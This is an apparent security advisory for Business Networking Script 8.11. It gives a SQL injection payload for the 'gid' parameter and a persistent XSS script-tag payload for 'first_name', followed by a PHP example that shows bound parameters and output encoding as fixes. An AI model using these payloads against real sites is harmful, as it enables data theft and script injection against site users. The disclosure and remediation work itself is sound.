Business Networking Script 8.11 Cross Site Scripting / SQL Injection

2017.01.17
Credit: Ahmet Gurel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89, CWE-79

# Exploit Title : ----------- : Business Networking Script v8.11- SQLi & Persistent Cross Site Scripting
# Author : ----------------- : Ahmet Gurel
# Google Dork : --------- : -
# Date : -------------------- : 16/01/2017
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage : http://itechscripts.com/business-networking-script/
# Software Price and Demo : $299.00 http://professional-network.itechscripts.com

########## 1-SQL Injection ##########

##### Vulnerable Parameter Type : GET
##### Vulnerable Parameter : gid
##### Vulnerable URL : http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
##### SQLi Parameter : ' OR '1'='1

########## 2-Persistent XSS Payload ##########

##### Vulnerable URL : http://localhost/[PATH]/home.php
##### Vuln. Parameter: first_name=
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>
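The two fixes this advisory points to, as an added example that is not the vendor's code: a validated, bound gid for the SQL injection and output encoding of first_name for the persistent XSS. The table layout, the function names and the shape of the vulnerable query are assumptions; the two test strings are the ones quoted in the advisory.

```php
<?php
declare(strict_types=1);
// Added example: schema, helper names and the unsafe query shape are assumptions.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE group_members (gid INTEGER, first_name TEXT)');

// Constructed rows; the second first_name is the advisory's payload, stored as-is
// so that the output step has to neutralise it.
$ins = $db->prepare('INSERT INTO group_members (gid, first_name) VALUES (?, ?)');
foreach ([[1, 'Alice'], [2, '\'"--></style></Script><Script>alert(1)</Script>']] as $row) {
    $ins->execute($row);
}

// Assumed shape of the flaw: gid concatenated into a quoted SQL literal.
function groupMembersUnsafe(PDO $db, string $rawGid): array
{
    $sql = "SELECT first_name FROM group_members WHERE gid = '" . $rawGid . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: gid must parse as a positive integer and is bound, never concatenated.
function groupMembers(PDO $db, string $rawGid): array
{
    $gid = filter_var($rawGid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($gid === false) {
        return [];                      // reject without touching the database
    }
    $st = $db->prepare('SELECT first_name FROM group_members WHERE gid = :gid');
    $st->bindValue(':gid', $gid, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Persistent XSS fix: encode for the HTML context at output time.
function renderName(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$input = "' OR '1'='1";                 // SQLi parameter from the advisory
printf("unsafe:   %d row(s)\n", count(groupMembersUnsafe($db, $input)));
printf("hardened: %d row(s)\n", count(groupMembers($db, $input)));
printf("encoded:  %s\n", renderName(groupMembers($db, '2')[0]));
```

Run with the PHP CLI and the pdo_sqlite extension: the concatenated query returns both rows for the advisory's input, the bound query returns none, and the stored payload is emitted as inert entities.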



Copyright 2018, cxsecurity.com

 
